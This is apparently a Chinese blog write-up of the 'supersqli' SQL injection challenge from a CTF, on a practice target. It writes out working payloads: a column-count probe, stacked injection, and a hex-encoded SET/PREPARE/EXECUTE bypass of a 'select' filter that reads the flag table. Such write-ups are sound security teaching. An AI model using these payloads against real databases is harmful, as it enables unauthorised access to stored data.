CTF-WEB-SQL注入-强网杯-攻防世界-随便注-supersqli

开题这样一个界面

1' order by 2#

判断出是两列

select被过滤了

换个方式,发现可以堆叠注入,查库

查表

查字段

因为select被过滤

第一种方法:用 handler绕过,使用介绍(【MySQL】MySQL 之 handler 的详细使用及说明_mysql handler-优快云博客

第二种方法:用sql内置方法绕过

我们常规查询数据是这样:select flag from `1919810931114514`

把上面sql语句进行16进制编码:73656c65637420666c61672066726f6d20603139313938313039333131313435313460

注入语句:-1';SeT @a=0x73656c65637420666c61672066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

参考:SQL注入进阶之路-针对堆叠注入的研究 - mi2ac1e - 博客园 (cnblogs.com)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值